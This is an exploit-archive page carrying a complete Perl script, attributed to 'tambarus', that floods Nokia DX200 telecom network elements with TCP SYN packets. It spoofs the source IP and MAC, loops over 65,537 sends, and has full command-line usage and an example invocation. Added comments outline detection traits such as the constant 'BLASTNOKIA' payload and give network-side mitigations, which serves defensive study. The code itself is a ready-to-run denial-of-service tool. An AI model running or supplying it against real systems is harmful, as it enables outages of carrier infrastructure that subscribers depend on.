Nokia DX200 Denial Of Service

2009-01-23T00:00:00
ID PACKETSTORM:74244
Type packetstorm
Reporter TaMBaRuS
Modified 2009-01-23T00:00:00

Description

                                        
                                            `#######################################################################  
#Vulnerability: Nokia TCP Syn Flood DoS - DX200  
#Synopsis : Denial of Service  
#Affected Platforms: DX200 M13 (MGW/HLR), S12 (BSC)  
#Severity: High Risk  
#Vendor: Nokia (http://www.nokia.com/)  
#Exploit Release Date: 01/21/2009  
#By: tambarus (tambarus@gmail.com)  
#######################################################################  
  
#!/usr/bin/perl  
  
# Defender summary: this script builds Ethernet frames carrying TCP segments
# with the SYN flag set and sends them in a loop to one destination IP/port.
# Source IP, source MAC and destination MAC are all supplied by the caller,
# so the source address seen in a capture says nothing reliable about the
# sending host.
# Traits visible in the code below that a sensor can match on: SYN set, the
# constant payload "BLASTNOKIA" carried in the SYN segment, the constant
# value 0x0010 assigned to the TCP checksum field, and a source port taken
# from the loop counter.
# Mitigation is network-side: limit which hosts may reach services on the
# affected elements, apply anti-spoofing (ingress) filtering, and rate-limit
# inbound SYNs upstream of the element.

# Each dependency is loaded through a string eval so that a missing module
# produces the readable error below instead of a compile-time failure.
eval ("use Getopt::Long;");die "[error] Getopt::Long perl module is not installed \n" if $@;  
eval ("use Net::RawIP;");die "[error] Net::RawIP perl module is not installed \n" if $@;  
eval ("use Term::ProgressBar;");  
die "[error] Term::ProgressBar perl module is not installed \n" if $@;  
my $VERSION = "1.0";  
# $PgmName is never assigned in this listing, so it interpolates as empty.
print "$0, $PgmName, V $VERSION \n";  
# Option targets are undeclared package variables; the script enables
# neither strict nor warnings.
GetOptions (   
"help" =>\$usage,  
"device=s" => \$device,   
"source=s" =>\$sourceip,  
"dest=s"=>\$destip,  
"sourcemac=s"=>\$sourcemac,  
"destmac=s"=>\$destmac,  
"port=n"=> \$tcpport,  
);  
  
# NOTE(review): a string literal containing a comma, passed later as the
# single argument to ethsend(); how the library interprets it is not
# visible here.
my $timeout = "0,1";
  
if ($usage) {&usage;}   
  
if (!$device) {  
$device= 'eth0'; # default network interface name (not an IP address)
}  
  
# Destination MAC, source IP, destination IP and TCP port are mandatory;
# each missing one prints a message and calls usage, which exits.
# The source MAC is optional (see the ethset branch below).
if (!$destmac) {print "Dest MAC not found \n"; &usage;}  
if (!$sourceip) {print "Source IP not found \n"; &usage;}  
if (!$destip) {print "Dest IP not found \n"; &usage;}  
if (!$tcpport) {print "TCP port not found \n"; &usage;}  
  
my $syn="1"; # value assigned to the TCP SYN flag of every segment
my $tcpdata = "BLASTNOKIA"; # constant payload in every segment; usable as a content signature
my $count=0;  
  
# Progress bar constructed with 32768 as its argument.
my $progress = Term::ProgressBar->new(32768);  
$progress->minor(0);  
# Frames are built at the Ethernet layer on the chosen interface.
# NOTE(review): sending this way normally needs elevated privileges on the
# sending host (root or an equivalent raw-socket capability) -- confirm for
# the platform in question.
$packet = new Net::RawIP;  
$packet-> ethnew($device);  
  
# Without --sourcemac only the destination MAC is set explicitly; with it,
# the frame's source MAC is whatever the caller supplied.
if (!$sourcemac) {  
$packet -> ethset( dest => $destmac);  
}else {   
$packet -> ethset( source =>$sourcemac, dest => $destmac);  
}  
  
# Send loop. $count is incremented both in the for header and at the end of
# the body, so it advances by two per iteration starting from 0.
for ($count=0; $count< 65537 ; $count++) {  
  
$packet->set({  
  
ip => {  
# Both addresses come straight from the command line, unvalidated.
saddr => $sourceip,  
daddr => $destip   
},  
  
tcp => {  
# The original comment here said "0 for auto correct", but the literal
# assigned is 0x0010, not 0. NOTE(review): whether the library recomputes
# the checksum for a non-zero value is not visible in this listing.
check => 0x0010 ,
source => $count,  
dest => $tcpport,  
syn => $syn,  
data => $tcpdata  
}});  
$packet->ethsend($timeout);  
#$packet->send($timeout);  
  
# $_ is not assigned anywhere in this loop, so the progress bar is not
# driven by $count.
$progress->update($_);  
$count++;  
}  
  
# usage: print the help text (a heredoc interpolating $0) and terminate the
# process with `exit shift`.
# Every call site in this script invokes it as `&usage;`, a form that hands
# the caller's current @_ to the sub instead of an explicit argument list.
# NOTE(review): at file scope that @_ looks empty, which would make the exit
# status 0 even on the "... not found" error paths -- confirm before
# relying on the exit code in any wrapper or test harness.
# The help text's example uses port 23; the page does not state which ports
# on the affected platforms are actually exposed.
sub usage {  
print <<EOF ;  
This vulnerability is already disclosed and can be exploited by TCP Syn Flooding.  
  
usage: $0 [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC] [--destmac=MAC] [--port=n]  
  
Options:  
  
--help This message  
--device Network interface (defaut set eth0)  
--source Victim source IP  
--dest Victim destination IP  
--sourcemac Victim source MAC  
--destmac MAC Address of the gateway  
--port TCP port   
  
Example: ./NokiaFlooder.pl --device eth0 --source 10.1.1.88 --dest 10.1.1.99 --sourcemac 00:11:22:22:11:00 --destmac 00:11:22:22:11:99 --port 23   
EOF   
# Exit status is the first element of @_, if any (see the note above).
exit shift;  
}`